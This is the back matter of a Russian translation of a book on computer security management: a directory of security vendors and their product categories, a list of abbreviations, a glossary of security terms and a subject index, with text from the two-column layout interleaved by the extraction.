www.spyrus.com Цифровые подписи и органы сертификации Электронная коммерция Смарт-карты 192 Люди и продукты, о которых следует знать SSH Communications Security www.ssh.com Доступ к данным Программы по обеспечению доступа к данным Частная виртуальная сеть Stonebridge www.stonebridgenetworks.com Защита телекоммуникаций и сетей Обучение и тренировки Sun Microsystems www.sun.com/security Консультационные услуги Брандмауэры Частная виртуальная сеть Sygate Technologies www.sygate.com Управление политиками распределенной защиты Symantec www.symantec.com Управление уязвимыми местами Защита интегрированных шлюзов Частная виртуальная сеть брандмауэров Защита от вирусов и фильтрация контента Администрирование предприятий Обнаружение вторжения Управление безопасностью Tally Systems www.tallysystems.com Сетевой мониторинг Политики и процедуры Инструменты сканирования и тестирования Оценка эффективности защиты T-NETIX www.t-netix.com Аутентификация пользователей и терминалов Консультационные услуги Люди и продукты, о которых следует знать Системы персональной идентификации - биометрические системы Защита внутренних коммутаторов Talos Technology Consulting, Inc.

• www.taIos.com Аутентификация пользователей и терминалов Системы персональной идентификации - биометрические системы Technical Communications Corp www.tccsecure.com Защита от прослушивания Приложения Защита факсимильных систем TenFour U.S. Inc.

www.tenfour.com Фильтрация контента Защищенная электронная почта Защищенный обмен сообщениями Антивирусное сканирование Thawte Certification www.thawte.com Служба цифровых сертификатов Thrupoint www.thrupoint.com Консультационные услуги Защита линий связи и сетей Восстановительные работы TippingPoint Technologies www.tippingpoint.com Устройства защиты сетей Tivoli Software из IBM www.tivoli.com Приложения Доступ к данным Электронная коммерция 17. РВХ - private branch exchange. - Примеч. пер.

18. Anti-eavesdropping - "eavesdropping" также означает «перехват информации». - Примеч. пер.

Люди и продукты, о которых следует знать Обнаружение вторжения/незаконного использования Защищенная операционная система Единая регистрация Top Layer www.toplayer.com Брандмауэры Фильтрация и мониторинг Интернета Обнаружение вторжения/незаконного использования Инструменты сканирования и тестирования Защита веб-сервера Trend Micro, Inc.

www.antivirus.com Консультационные услуги Защита от вирусов и их обнаружение Trintech Group www.trintech.com Электронная коммерция Tripwire, Inc.

www.tripwire.com Оценка целостности файла Обнаружение и предупреждение вторжения TruSecure www.trusecure.com Провайдер управляемой защиты TrustWorks www.trustworks.com Частные виртуальные сети TumbleweedCommunications Corp www.tumbleweed.com Управляемые защищенные коммуникации Ubizen www.ubizen.com Приложения Цифровые подписи и органы сертификации Люди и продукты, о которых следует знать Фильтрация и мониторинг Интернета Сетевой мониторинг Защита веб-серверов Unisys www.unisys.eom Аутентификация пользователей и терминалов Единая регистрация Vanguard Integrity Professionals www.go2vanguard.com Приложения Конференция по вопросам безопасности VeriSign www.verisign.com Доступ к данным Цифровые сертификаты и управление ключами Единая регистрация Vasco www.vasco.com Продукты для шифрования Защищенный удаленный доступ V-ONE Corporation www.v-one.com Брандмауэры Защищенные компьютерные системы и процессоры Смарт-карты и электронные жетоны Системы персональной идентификации Политики и процедуры WatchGuard Technologies, Inc.

wvvw.watchguard.com Управление доступом Брандмауэры Фильтрация и мониторинг Интернета Частная виртуальная сеть Защита веб-серверов 196 Люди и продукты, о которых следует знать Win Magic Inc.

www.winmagic.com Продукты для шифрования файлов Zero Knowledge Systems www.freedom.net Защищенные телекоммуникации Zone Labs, Inc.

www.zonelabs.com Брандмауэры Фильтрация и мониторинг Интернета Политики и процедуры Сокращения IDS (Intrusion Detection System) - система ASIS (American Society for Industrial обнаружения вторжения.

Security)- Американское общество по про­ мышленной безопасности.

IRT (Incident Response Team) - группа реа­ гирования на инциденты.

CERT (Computer Emergency Response Team) - группа реагирования на чрезвычай­ ISP (Internet Service Provider) - провайдер ные ситуации.

Интернет-услуг.

CEO (Chief Executive Officer) - генераль­ ISS (Internet Security Scanner) - сканер ный директор, защиты в Интернете.

CFO (Chief Financial Officer)- финансовый MIS (Management Information System) - ад­ директор.

министративные информационные системы.

CIO (Chief Information Officer) - директор NCSA (National Computer Security Associa­ по информационным технологиям.

tion) - Национальная ассоциация ком­ пьютерной безопасности.

CS1 (Computer Security Institute) - Инсти­ тут компьютерной безопасности.

NIS (Network Information Service) - сетевая информационная служба.

CSIRT (Computer Security Incident Response Team) - группа реагирования на компью­ PGP (Pretty Good Privacy) - «надежная кон­ терные инциденты.

фиденциальность» (алгоритм шифрова­ ния).

СТО (Chief Technology Officer) - техниче­ ский директор.

РОС (Point of Contact) - точка контакта (контактный телефон).

DOD (U.S. Department of Defense) -Мини­ стерство обороны США.

SATAN (System Administrator Tool for Ana­ lyzing Networks) - инструмент системного FAQ (Frequently Asked Questions) - часто администратора для анализа сетей.

задаваемые вопросы.

WWW (World Wide Web) - Всемирная пау­ FIRST (Forum of Incident Response and Secu­ тина (Интернет).

rity Teams) - Форум групп реагирования на инциденты и групп обеспечения безопас­ ности.

Глоссарий Back door Аудит безопасности См. «Черный ход». Независимая профессиональная ревизия состояния безопасности, при которой тес­ ISP тируется и исследуется соответствие См. «Провайдер услуг Интернет». средств защиты компании существующим нормам. Его результаты позволяют ауди­ Logic bomb тору рекомендовать проведение необходи­ См. «Логическая бомба». мых изменений в средствах защиты, поли­ тиках и процедурах.

Password cracker Аутентификация См. «Взломщик паролей».

Проверка идентичности пользователя, Password sniffer устройства или другого объекта в системе.

См. «Анализатор паролей».

«Бомба с часовым механизмом» РОС Программа, внедряемая взломщиком в про­ См. «Точка контакта».

граммное обеспечение и срабатывающая при наступлении определенного момента Snapshot времени или после истечения заданного См. «Моментальный снимок».

временного интервала.

Snooping tool Брандмауэр См. «Инструмент снупинга».

Система защиты, контролирующая поток трафика между сетями. Существуют не­ Spoof сколько его конфигураций: фильтрация См. «Имитация».

(отсеивание), управление приложениями, шифрование, установка «демилитаризован­ Time bomb ных зон» и т. д.

См. «Бомба с часовым механизмом».

Взломщик паролей Trap door Программа, содержащая полные словари, См. «Черный ход».

которые она использует для подбора паро­ лей пользователя.

Авторизация Предоставление официально одобренных Вирус прав доступа пользователю, процессу или Код, внедряемый в программу компьютера.

программе в соответствии с политикой Он начинает работать при исполнении про­ безопасности компании.

граммы. «Проснувшись», вирус может раз­ множаться, посылать сообщение, уничто­ Анализатор паролей («ищейка») жать информацию или снижать производи­ См. «Инструмент снупинга».

тельность системы.

Анализ риска Внешняя эскалация Процесс определения величины риска для Процесс передачи сообщения о бреши безопасности. При анализе риска определяют­ в безопасности какому-либо лицу или ся элементы защиты, требующие улучшения.

группе, находящимся вне отдела, отделе 199 Глоссарий ей для тестирования эффективности защи­ ния или компании, в которой это случи­ ты путем попыток взлома.

лось. После эскалации проблемы ответст­ венность за ее решение полностью или час­ Компрометация тично берет на себя сторона, в направлении Нарушение взломщиком политики безо­ которой была проведена эскалация.

пасности компании, в результате которого Внутренняя эскалация может быть изменена, уничтожена или Процесс передачи сообщения о бреши украдена информация.

в безопасности на вышестоящий команд­ Компьютерная фальсификация ный уровень внутри отдела, отделения или компании, в которой это случилось.

Компьютерное преступление, при котором взломщик стремится получить деньги или Гарантия другие ценности от компании. Часто все Степень уверенности, означающая, что следы этого преступления скрываются.

архитектура информационной системы Компьютерная фальсификация обычно вы­ соответствует политике безопасности орга­ зывает изменение, уничтожение, кражу низации.

или раскрытие информации.

Доска объявлений Компьютерное преступление Позволяет пользователям Интернета писать Любой вид незаконных действий по отно­ свои сообщения или читать сообщения, «вы­ шению к электронной информации и ком­ вешиваемые» другими пользователями, а так­ пьютерному оборудованию.

же обмениваться программами и файлами.

Контроль Доступ Защитные меры, предпринимаемые компани­ Возможность производить чтение, запись, ей по уменьшению риска раскрытия защиты.

изменения в каком-либо из системных ре­ сурсов компании или использовать его ка­ Контрольный журнал ким-либо другим образом.

Документальная запись событий, позво­ ляющая аудитору (или системному адми­ Идентификация нистратору) воссоздать события, произо­ Распознавание пользователей в системах шедшие в системе.

компании по их уникальным именам.

Конфиденциальность Имитация Ограничение доступа к «чувствительной» Получение доступа к системе при помощи (закрытой) информации для определенных маскировки под законного пользователя.

лиц (как входящих в состав сотрудников организации, так и не являющихся таковы­ Интернет ми) или групп сотрудников самой органи­ Самая большая в мире коллекция сетей.

зации. Конфиденциальность информации зависит от степени, до которой организа­ Инструмент «снупинга» ция должна закрывать свою информацию Программа, используемая взломщиком для (апример, для служебного пользования, сбора паролей и другой информации.

для личного пользования или для общего Интранет пользования).

Внутренняя сеть компании.

«Лазейка» Команда «тигров» См. «Черный ход».

Группа профессиональных экспертов по безопасности, привлекаемая компани­ Глоссарий Легкий доступ ет в себя действия по реагированию на чрез­ вычайную ситуацию, операции резервного Взлом системы с минимальными усилия­ копирования и восстановительные работы.

ми, используя хорошо известное уязвимое место, и получение прав доступа су­ Подотчетность перпользователя (root) менее чем за 30 се­ Обеспечение возможности установить, что кунд (лакомый кусок для взломщика).

какой-либо вид деятельности на поддержи­ (Данный термин используется также для ваемой системе связан с конкретным ли­ обозначения уязвимого места из-за ошибки цом, отвечающим за целостность этой ин­ в конфигурации системы. -Примеч. пер.) формации.

«Логическая бомба» Провайдер услуг Интернет Программа, внедряемая взломщиком в про­ Компания, через которую отдельное лицо граммное обеспечение. «Логическая бомба» или организация получает доступ в Интернет.

остается в неактивном состоянии, пока не бу­ Обычно провайдер Интернет-услуг кроме дут выполнены заранее определенные усло­ доступа в Интернет обеспечивает услуги вия. После этого программа осуществляет ка­ электронной почты и хранение домашней кое-либо несанкционированное действие.

страницы. Некоторые провайдеры Интернет услуг также обеспечивают удаленное хране­ «Моментальный снимок» ние информации и резервное копирование.

Копия содержимого памяти компьютера (первичной памяти, определенных реги­ Проникновение стров и т. д.) на данный момент времени.

Действие, направленное на получение не­ Как и фотоснимок, «моментальный сни­ авторизованного доступа в систему.

мок» может применяться для поимки взломщика. При этом используются записи Процедуры безопасности информации, сделанные до завершения Набор подробных инструкций, конфигура­ или отражения атаки, в ходе которой хакер ций и рекомендаций по выполнению поли­ мог стереть эту информацию.

тик безопасности компании.

Надежность Процедуры реагирования на инцидент Вероятность того, что система будет вы­ Официальные письменные инструкции полнять свои задачи в течение определен­ с под-робным описанием шагов, предприни­ ного промежутка времени в предполагае­ маемых в случае возникновения серьезных мых условиях эксплуатации.

проблем с безопасностью, таких? как взлом.

Разработка подробных процедур реагирова­ «Отказ от обслуживания» ния на инцидент до возникновения пробле­ Действие или последовательность дейст­ мы является признаком хорошо построенной вий взломщика, в результате которых сис­ системы безопасности.

темы не могут выполнять свои функции.

Разрешения План для чрезвычайной ситуации Действия, которые разрешается совершать План защиты, предусматривающий обес­ некоторому субъекту по отношению к како­ печение работоспособности жизненно важ­ му-либо объекту (например, чтение, запись, ных для компании компьютерных ресурсов изменение или удаление).

в случае стихийного бедствия (например, землетрясения или наводнения). Он включа Риск Вероятность того, что будет, преднамерен­ 1. Иногда называется также План обеспечения но или случайно, использовано уязвимое непрерывной работы и восстановления. место системы.

Примеч. науч. ред.

Глоссарий Целостность информации Сохранение тайны Уверенность в том, что информация компа­ Защита информации компании от неав­ нии не подверглась изменению или уничто­ торизованного чтения. Например, средства жению как по случайности, так и в резуль­ шифрования создают уровень защиты, при тате злого умысла.

котором гарантируется целостность ин­ формации посредством ее сокрытия.

«Червь» Средства противодействия Независимая программа, перемещающаяся в адресном пространстве и воспроизводя­ Средства, используемые компанией для щая себя в новом месте. «Червь» способен уменьшения угроз системе. Средствами про­ быстро размножаться и может вызывать тиводействия могут быть аппаратные устрой­ «отказ от обслуживания» вследствие пере­ ства, пакеты программ, процедуры и т. д.

грузки системных ресурсов.

Точка контакта (контактный телефон) «Черный ход» Лицо или лица, которым пользователи и/или Программа, специально написанная в при­ системные администраторы должны немед­ ложении или операционной системе для ленно сообщать о взломе или подозрении на того, чтобы обеспечить неавторизованный брешь в защите. Такой контактный телефон доступ. Также называется «лазейкой».

равносилен номеру линии службы спасения 911.

Экстранет Угроза Наращивание интранет компании за счет внешних по отношению к компании сис­ Любое явление, создающее возможность тем. Экстранет может применяться для нарушения целостности, конфиденциаль­ обеспечения легкого доступа к базам дан­ ности и доступности информации.

ных и другим источникам информации при Управление доступом обмене между компанией и ее клиентами и/ Предотвращение неавторизованного исполь­ или поставщиками. См. также «Интранет».

зования какого-либо системного ресурса ком­ Эскалация пании как снаружи (взломщиком), так и из­ Процедура, предусматривающая доклад нутри (сотрудником, не имеющим разреше­ (и передачу ответственности за устранение) ния на доступ).

о бреши в безопасности вышестоящему Уязвимое место командному уровню. См. также «Внутренняя Конкретное слабое место в политике безо­ эскалация», «Внешняя эскалация» и «Эскала­ пасности компании, проекте системы, ее ция конфликта интересов».

настройке или средствах защиты, которым Эскалация конфликта интересов может воспользоваться взломщик.

Предварительно установленная процедура Хакер передачи расследования инцидента, свя­ Лицо со злыми намерениями, собирающее занного с безопасностью, на вышестоящий информацию о «дырах» в компьютерной уровень руководства в случае, если в нем защите и взламывающее компьютеры без подозреваются как члены группы техниче­ разрешения владельца системы. ской поддержки, так и члены группы обес­ печения безопасности.

Хакерство Использование уязвимых мест в системе для получения неавторизованного доступа.

Предметный указатель @Stake, 195 CIAC - Наблюдательный отдел по компьютерным инцидентам, А Cigna Insurance, Absolute Software Corporation, Cisco Systems, Inc., AccessData Corporation, Citadel Computer Systems, ActivCard, Inc., CloudNine Communications, Aladdin Knowledge Systems, Inc., CMS Technologies, Alternative Computer Technology, Inc., Code Red/Code Red II, 11, Amazon.com, 28- Codex Data Systems, 206- ArcSight, Cogentric, Argus Systems Group, Inc., Communication Devices, Inc., ASIS - Американское общество Computer Associates, no промышленной безопасности, Computer Sciences Corporation, Astaro Corporation, Computer Security Products, Inc., Authenex, Computer Sentry Software, Authentify, ComputerCOP Corporation, 207- Aventail Corporation, Conclusive, В CONSUL risk, COPS - Computer Oracle and Password Baltimore Technologies, 203- System, Bigfix, COPS, Bindview Development, Coroner's Toolkit, Biometric Access Corporation, Costa Corp, исследование проблемы, 145- BLOCKADE Systems Corporation, Counterpane Internet Security, Inc., BLUE LANCE, Crack, программа, 31, 41-42, BorderWareTechnologies Inc., Cranite Systems, BRICKServer, CRYTOCard, 208- Buddy System, The, CSI - Институт компьютерной Bugtraq, безопасности, 10, Buy.com, 28- CSiRT-Группа реагирования С на компьютерные инциденты, C.I. Host, дело, 148,150- CVE, Camelot, Cyber Safe Corporation, Captus Networks, Cyber-Ark Software, CERIAS, CyberGuard Corporation, CERT, координационный центр (Carnegie CyberSafe, Mellon University), 29, 33, Cyber-SIGN, Certco, CyberSoft, Inc., Certicom Corporation, 205- Cylink, 209- Cgichk, D Chambersburg Museum of Art, исследование Data Systems Analysts, проблемы, 114- Datacard Corporation, безопасность:

DataKey, Inc., в чьих она руках, 117- DataLynx, Inc., перекладывание ответственности, как жертва войны, 118-19 Deloitte Touche & Tohmatsu, обход корпоративной сети, 114 Digital Delivery Inc., сбор доказательств, 115- DIVERSINET Corporation, системные администраторы против группы Dsniff, • обеспечения безопасности, 116— E Check Point, Chrysalis-ITS, 206 eBay, 28- 203 Предметный указатель eEye Digital Security, I EFF-"Фонд электронного фронтира», IBM, ENSURE Technologies, 210- ICSA, Entegrity Solutions, IDS - системы обнаружение вторжения, Entercept SecurityTechnologies, Info Express, Inc., Entrust Technologies, Info Security News, Ernst &Young LLP, Integralis, eSecurity, Inc., Intel Corporation, eSecurityOnline LLC, Intellitactics.com, esniff, intermint Financial, исследование проблемы, Exigent, дело, 148, 72- EyeDentify, Inc., обучение безопасности, 76- финансирование, F сбор фактов, 73- FinJan, тестирование систем, 74- Firewalk, Intrusion Inc., First Fidelity, исследование проблемы, 3- IntruVert, FIRST, Investigative Group International, FishNet Consulting, Inc., IP Filter, Forensic Challenge, 29- IRT- группа реагирования на инцидент, Forescout, A ISC 2-Международный консорциум по Foundstone, сертификации безопасности F-Secure Inc., информационных систем, Funk Software, Inc., ISO 17799, G ISSA - Ассоциация защиты информационных систем, Gemini Computers, Inc., Gemplus Corp, 212- J G-Force, JFC Pharmaceutical, исследование Giiian Technologies Inc., проблемы, 56- GLBA - Акт Грэмма-Лича-Блайли, архитектура безопасности, 149-50, аудиты безопасности, 61- Global Chips, исследование проблемы, 100-107 кто несет ответственность за безопасность, 61- незапланированное тестирование безопасности, администратор брандмауэра, 101- 57- брандмауэр, 102— неподкрепленные политики, 59- отношение к работе, 104- политика настройки безопасности, 56- руководители и безопасность, 102- сетевые схемы, 58- Global Technologies Group, Inc., список рисков, Global Technology Associates, Inc., хакер, GNUPG, К Great Circle Associates, Klaxon & Tocson, Guardent, Kroll, Guidance Software, 213- Kyberpass Corporation, H L Harris Corporation, Hewlett-Packard Corporation, 214 LOphtCrack, Hifn, 214 Lancope, HIPAA - Акт о пересылке и учете LJK Software, информации о страховании здоровья, 149, Lloyd's, HIPPA - Акт о сохранении тайны и защите Lsof, информации о состоянии здоровья Lucent Technologies, Honey Project, 29- Lumeta Corporation, Hping2, M HTCIA - Ассоциация по расследованию McAfee, преступлений в области высоких технологий, McConnell's Drugs, исследование проблемы, 56- Предметный указатель JFC Pharmaceutical, 56- Riptech (Symantec), архитектура безопасности, RiskWatch, конкуренты, 62- Rockland General, исследование проблемы, незапланированное тестирование безопасности, 57- 86- неподкрепленные политики, 59- выяснение риска, политика установки средств безопасности, 56- неавторизованный доступ, 89- сетевые схемы, 58- планирование работы с подрядчиком, хакеры, прохождение системы физического контроля.

Pages:     | 1 |   ...   | 2 | 3 || 5 |



© 2011 www.dissers.ru - «Бесплатная электронная библиотека»

Материалы этого сайта размещены для ознакомления, все права принадлежат их авторам.
Если Вы не согласны с тем, что Ваш материал размещён на этом сайте, пожалуйста, напишите нам, мы в течении 1-2 рабочих дней удалим его.